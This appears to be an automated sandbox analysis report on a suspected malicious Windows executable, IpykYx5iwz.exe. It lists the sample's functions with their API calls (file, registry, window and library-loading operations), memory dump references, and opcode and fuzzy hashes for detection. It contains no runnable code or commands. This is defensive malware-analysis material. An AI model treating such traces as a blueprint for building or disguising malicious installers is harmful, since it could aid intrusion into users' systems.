Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
Instruction ID: df23799fdaa3b0d09e183135811d5b6505fb0232db5b531e6c94311c9a263d3d
Opcode Fuzzy Hash: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
Instruction Fuzzy Hash: E9713271D00228CBDF28CF98C894BADBBB1FB44305F15816ED456BB281C7785A96DF45

Function 004022B2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406444: FindFirstFileA.KERNELBASE(74DF3410,00422580,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00405C0A,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 0040644F
Part of subcall function 00406444: FindClose.KERNEL32(00000000), ref: 0040645B

lstrlenA.KERNEL32 ref: 004022F2
lstrlenA.KERNEL32(00000000), ref: 004022FC
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 4174c3bd40d337440defe0f5e29d48f5a1345860c7b310d651bf55423c86e276
Instruction ID: 89f0f33848aa91cfff15a1f14c00ba247df3d091a9b87d06c6d493ced92827b6
Opcode Fuzzy Hash: 4174c3bd40d337440defe0f5e29d48f5a1345860c7b310d651bf55423c86e276
Instruction Fuzzy Hash: 55113C71904308AACB00EFF98A49A9EBBF9EF04318F11417FA515FB2C2D6B8C541CB59

Function 004030B5 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403061,000000FF,00000000,00000000,0040A130,?), ref: 004030DA

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7b47499b20b7e0eb4373016da4b9a781a902caa6bff9f154131303d20151f790
Instruction ID: 8877ead6e8c69a3a66606c491d636c96e1969607261919898ffcb404bfb58159
Opcode Fuzzy Hash: 7b47499b20b7e0eb4373016da4b9a781a902caa6bff9f154131303d20151f790
Instruction Fuzzy Hash: 95318230200219FFDB109F95DD44ADA3FA8EF09355F14813AF905EA1D0D738DA55DBA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2159a8d9d6e65358a4161211ef1f590ae05e96406b910f9160f8c9bc7d0c6a2b
Instruction ID: 311c0974f443c70014e78c9ea796c64afcef844d2d6d055f15de617139823c28
Opcode Fuzzy Hash: 2159a8d9d6e65358a4161211ef1f590ae05e96406b910f9160f8c9bc7d0c6a2b
Instruction Fuzzy Hash: BB01F431B202109BE7194B389E05B2A36A8E710315F51823FF951F65F1D778CC038B4C

Function 004023E8 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402409
RegCloseKey.ADVAPI32(00000000), ref: 00402412

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: e0b28e9c8ac8b77ab35856a8c1314002fd8091bc2f13caf3de4c7febb99b0951
Instruction ID: b0cec607119adc8cffd5a830a54634e929a7e060f3ed9e07a281962f4218e759
Opcode Fuzzy Hash: e0b28e9c8ac8b77ab35856a8c1314002fd8091bc2f13caf3de4c7febb99b0951
Instruction Fuzzy Hash: 11F0BB32A001209BD701AFB89B4DBAE72E9EB54315F16017FF502B72C1D6F85E01876D

Function 00401E8F Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EAD
EnableWindow.USER32(00000000,00000000), ref: 00401EB8

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: fe1b4b3cb0f382fbfc48822360631ae8afeaad143f9a7bbb39b70e3327b65116
Instruction ID: 4a629b0aaa3be5249734218c61b48fc5c6e6f5ce39cae6bb6fe68cf9429d748b
Opcode Fuzzy Hash: fe1b4b3cb0f382fbfc48822360631ae8afeaad143f9a7bbb39b70e3327b65116
Instruction Fuzzy Hash: 9BE01272A04210DFD715DFA8AA859AE77B4FB84325F11093BE102F11D1D7B45841966D

Function 0040156F Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000), ref: 00401581
ShowWindow.USER32(00010456), ref: 00401596

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 8000dae284af2ad838ec12f8c7506c0521177000968a2beca575aea3bd43856e
Instruction ID: 4470023cb5816ce10f16f0634b3dbbadf6695934031e428a0ae7f0cf7c19a842
Opcode Fuzzy Hash: 8000dae284af2ad838ec12f8c7506c0521177000968a2beca575aea3bd43856e
Instruction Fuzzy Hash: DDE0E676B101149BC725CF58EE9087E73BAEB94311751053FE502F3690C6B99D458B58

Function 004064D9 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
GetProcAddress.KERNEL32(00000000,?), ref: 00406506

Part of subcall function 0040646B: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406482
Part of subcall function 0040646B: wsprintfA.USER32 ref: 004064BB
Part of subcall function 0040646B: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064CF

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
Instruction ID: 24fce0d07730d2b83aa8b6d9be68f80c4376d605e597938b653f22d9b8a4cb61
Opcode Fuzzy Hash: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
Instruction Fuzzy Hash: 77E0863260421067D2106B745E0482773A89FC4700302483EF946F2144DB38DC76AA6D

Function 00405CDA Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405CDE
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19

Function 004057AB Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403377,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 004057B1
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004057BF

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
Instruction ID: f4356607e3dcfc3587ce77828b4c105ca85d8a37fee652994368300620bd2749
Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
Instruction Fuzzy Hash: E6C04C30326A01DAD6515F209F087177A64BB60B41F11443DA246E21E0DA359415E92D

Function 73402A38 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 73402AF7

Memory Dump Source

Source File: 00000000.00000002.1818278382.0000000073401000.00000020.00000001.01000000.00000006.sdmp, Offset: 73400000, based on PE: true

Associated: 00000000.00000002.1818246559.0000000073400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1818304122.0000000073403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1818325879.0000000073405000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73400000_IpykYx5iwz.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 7ab7a00040de97fd615427345528b94eabc008392649a6bd7b0b8e941a8fc71f
Instruction ID: 7cc8bd9f211d43b3a04b1e10f2dcd7cc0f0199f7359ec4367b5b03c47730585f
Opcode Fuzzy Hash: 7ab7a00040de97fd615427345528b94eabc008392649a6bd7b0b8e941a8fc71f
Instruction Fuzzy Hash: 6B416FB3700218EFEB2DAFA5DA80B5937B9EB44318F2494F9D949F63C0C63895418F58

Function 00402631 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: e17dcc65da12fa7f7507a6bc2d242c9522ddbfad326095c9a15d5b6e59271a88
Instruction ID: f7bed4abd913bf6fc464966fb6c19a800e0e64c640bfd3592dafb9d6802a6cff
Opcode Fuzzy Hash: e17dcc65da12fa7f7507a6bc2d242c9522ddbfad326095c9a15d5b6e59271a88
Instruction Fuzzy Hash: 6F21D870C0428AAECF218F644A496BFBB709F11318F14847FE891B63D2C5BD8985CB1D

Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 1dee3def93436aeb5a84ae895b3a113aac818a50224140a247bf5802f6714415
Instruction ID: 875ef897b1c8220e908ce9d70ba70a7e8e4cbf3698da85ce3a0217b7c26b2a9a
Opcode Fuzzy Hash: 1dee3def93436aeb5a84ae895b3a113aac818a50224140a247bf5802f6714415
Instruction Fuzzy Hash: B0F0963160421163CB117BB95F4DE5F25A8DF46328B21023BF021B21D2D6BC8501865F

Function 00402363 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 2ef620b7f16f149139dfc3728134166f5ac205edbe637a3672e148c84da2c520
Instruction ID: 00be3bb5cfe09e5788b1f0bae87ec1d7a9c2ea1fc05a431f2d4690520b5a9855
Opcode Fuzzy Hash: 2ef620b7f16f149139dfc3728134166f5ac205edbe637a3672e148c84da2c520
Instruction Fuzzy Hash: FEE04F31A007256BDB213EB25E8ED6F3669AB84744B16113FFA01BA2C2D9BC1C05C26D

Function 00405FF5 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402BDD,00000000,?,?), ref: 0040601E

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 7aa5a059cc8f13803465185a3c8b2217c2fd81e6017869bfeb287b42a0244da8
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 29E0E67215010ABEEF199F50DD0AD7B375DEB04304F00452EFA06D4051E6B5AD306A35

Function 00405D52 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,00403339,0040A130,0040A130,0040323D,004138D8,00004000,?,00000000,004030E7), ref: 00405D66

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
Instruction ID: 5fe52956bc080eb5845b2a6899c4c32d397a31a93509f9c809a3324e3603bd48
Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
Instruction Fuzzy Hash: F9E0B632210A5EABDF109E559C04FEB7B6CEF05260F048437F965E6160E671E8219AA4

Function 00405D81 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040CB66,0040B8D8,004032BD,0040B8D8,0040CB66,004138D8,00004000,?,00000000,004030E7,00000004), ref: 00405D95

Memory Dump Source

